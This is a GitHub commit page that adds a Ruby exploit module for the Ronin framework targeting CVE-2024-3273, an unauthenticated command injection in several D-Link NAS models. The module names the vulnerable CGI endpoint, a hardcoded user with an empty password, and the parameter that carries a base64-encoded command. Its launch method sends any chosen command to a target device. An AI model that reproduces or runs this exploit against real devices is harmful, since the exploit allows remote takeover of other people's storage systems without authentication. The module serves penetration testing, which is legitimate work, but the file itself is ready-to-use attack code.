-
-
Notifications
You must be signed in to change notification settings - Fork 2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
4a77b82
commit 51c880f
Showing
1 changed file
with
62 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,62 @@ | ||
| #!/usr/bin/env -S ronin-exploits run -f | ||
|
|
||
| require 'ronin/exploits/command_injection' | ||
| require 'ronin/exploits/mixins/http' | ||
| require 'ronin/support/encoding/base64' | ||
|
|
||
| module Ronin | ||
| module Exploits | ||
| class CVE_2024_3273 < CommandInjection | ||
|
|
||
| include Mixins::HTTP | ||
|
|
||
| register 'd-link/CVE-2024-3273' | ||
|
|
||
| quality :untested | ||
| release_date '2024-04-07' | ||
| disclosure_date '2024-04-03' | ||
| advisory 'CVE-2024-3273' | ||
|
|
||
| author "Postmodern", email: "postmodern.mod3@gmail.com" | ||
| summary "Command injection in D-Link NAS " | ||
| description <<~DESC | ||
| D-Link NAS devices DNS-320L, DNS-325, DNS-327L and DNS-340L up to | ||
| 20240403 are affected by a command injection in the `system` query | ||
| parameter of the `/cgi-bin/nas_sharing.cgi` HTTP end-point. | ||
| GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=PAYLOAD | ||
| Where `PAYLOAD` is the base64 encoded command to execute. | ||
| DESC | ||
| references [ | ||
| "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383", | ||
| "https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE", | ||
| "https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE/blob/main/exploit.py" | ||
| ] | ||
|
|
||
| # | ||
| # Sends the HTTP GET request for | ||
| # `/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=PAYLOAD` | ||
| # to the target host where `PAYLOAD` is the base64 encoded command to | ||
| # execute. | ||
| # | ||
| def launch | ||
| encoded_command = payload.to_s.base64_encode(mode: :url_safe) | ||
|
|
||
| response = http_get( | ||
| '/cgi-bin/nas_sharing.cgi', query_params: { | ||
| user: 'messagebus', | ||
| passwd: '', | ||
| cmd: '15', | ||
| system: encoded_command | ||
| } | ||
| ) | ||
|
|
||
| unless response.code == '200' | ||
| fail("GET #{base_url}/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=#{encoded_command} returned HTTP #{response.code}") | ||
| end | ||
| end | ||
|
|
||
| end | ||
| end | ||
| end |